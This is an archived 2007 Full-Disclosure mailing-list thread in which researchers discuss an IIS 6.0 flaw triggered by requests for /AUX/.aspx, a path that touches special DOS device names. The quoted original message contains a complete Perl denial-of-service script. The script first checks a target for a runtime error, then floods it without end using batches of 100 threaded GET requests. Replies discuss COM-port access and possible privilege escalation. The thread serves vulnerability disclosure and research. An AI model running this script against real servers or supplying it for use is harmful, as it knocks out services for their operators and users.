Dear kingcope, Funny enough, there is a chance this vulnerability can also be exploited as a local unauthorized access or privilege escalation, to execute user-supplied .aspx script from COM port (via serial cable) without having console access with permissions of Web application. IWAM_%COMPUTERNAME% is default, but it's often elevated for application pools for different reasons. Need to be tested though. Same vulnerability existed in IndigoPerl some time ago. See "One more funny bug" in http://securityvulns.com/docs6145.html --Wednesday, May 23, 2007, 12:54:35 PM, you wrote to 3APA3A@SECURITY.NNOV= ..RU: k> Hello Russian friend, k> This is an interesting thought. As you see in the exception k> And in the exception backtrace of IIS it tries to access \\.\AUX k> Or other special device names. Normally this is blocked by a k> C# method which checks the path (for example /AUX.aspx is blocked). k> Best Regards, k> Kingcope k> -----Original Message----- k> From: 3APA3A [mailto:3APA3A@SECURITY.NNOV.RU]=20 k> Sent: Wednesday, May 23, 2007 10:41 AM k> To: kingcope k> Cc: Full-Disclosure; bugtraq@securityfocus.com k> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a = DoS??? k> Dear kingcope, k> It's vulnerability regardless of DoS impact, because it allows attack= er k> to access special DOS devices (COM1 in this case). E.g. it could be us= ed k> to read data from device attached to COM1 or prevent another applicati= on >>from accessing this port (or LPT), because access to ports is exclusive= .. k> --Tuesday, May 22, 2007, 9:10:08 AM, you wrote to k> full-disclosure@lists.grok.org.uk: k>> Hello List, k>> Recently I saw a small bug in IIS 6.0 when requesting a special path. k>> When I request /AUX/.aspx the server takes a bit longer to respond as k>> Normally. So I did write an automated script to see what happens if k>> I request this file several times at once. The result is that some k> servers k>> On the internet get quite instable, some do not. On some servers afte= r I k>> Stop the attack I get an exception that the Server is too busy/Unhand= led k>> Exception on the wwwroot (/) path. k>> Can you/the list confirm that? k>> Here is a lame testing script for this stuff: k>> #When sending multiple parallel GET requests to a IIS 6.0 server k> requesting k>> #/AUX/.aspx the server gets instable and non responsive. This happens k> only k>> #to servers which respond a runtime error (System.Web.HttpException) k>> #and take two or more seconds to respond to the /AUX/.aspx GET reques= t. k>> # k>> # k>> #signed, k>> #Kingcope kingcope@gmx.net k>> k> ######################################################################= #### k>> k> ###*******************************************************************= **** k>> ### k>> ### k>> ### k>> ### Lame Internet Information Server 6.0 Denial Of Service (nonperman= ent) k>> ### by Kingcope, May/2007 k>> ### Better run this from a Linux system k>> k> ######################################################################= #### k>> use IO::Socket; k>> use threads; k>> if ($ARGV[0] eq "") { exit; } k>> my $host =3D $ARGV[0]; k>> $|=3D1; k>> sub sendit { k>> $sock =3D IO::Socket::INET->new(PeerAddr =3D> $host, k>> PeerPort =3D> 'http(80)', k>> Proto =3D> 'tcp'); k>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: k>> $host\r\nConnection:close\r\n\r\n"; k>> } k>> $sock =3D IO::Socket::INET->new(PeerAddr =3D> $host, k>> PeerPort =3D> 'http(80)', k>> Proto =3D> 'tcp'); k>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: k>> $host\r\nConnection:close\r\n\r\n"; k>> $k=3D0; k>> while (<$sock>) { k>> if (($_ =3D~ /Runtime\sError/) || ($_ =3D~ /HttpException/)) { k>> $k=3D1; k>> last; k>> } k>> } k>> if ($k=3D=3D0) { k>> print "Server does not seem vulnerable to this attack.\n"; k>> exit;=09 k>> } k>> print "ATTACK!\n"; k>> while(1){ k>> for (my $i=3D0;$i<=3D100;$i++) { k>> $thr =3D threads->new(\&sendit); k>> print "\r\r\r$i/100 "; k>> } k>> foreach $thr (threads->list) { k>> $thr->join; k>> } k>> } k>> _______________________________________________ k>> Full-Disclosure - We believe in it. k>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html k>> Hosted and sponsored by Secunia - http://secunia.com/ --=20 ~/ZARAZA http://securityvulns.com/ =F4=C1=CB=C9=CD =CF=C2=D2=C1=DA=CF=CD =CF=CE =D5=CD=C9=D2=C1=C5=D4 =D7 =DB= =C5=D3=D4=CF=CA =D2=C1=DA - =C9 =CF=D0=D1=D4=D8 =CE=C1 =CE=CF=D7=CF=CD =CD= =C5=D3=D4=C5. (=F4=D7=C5=CE)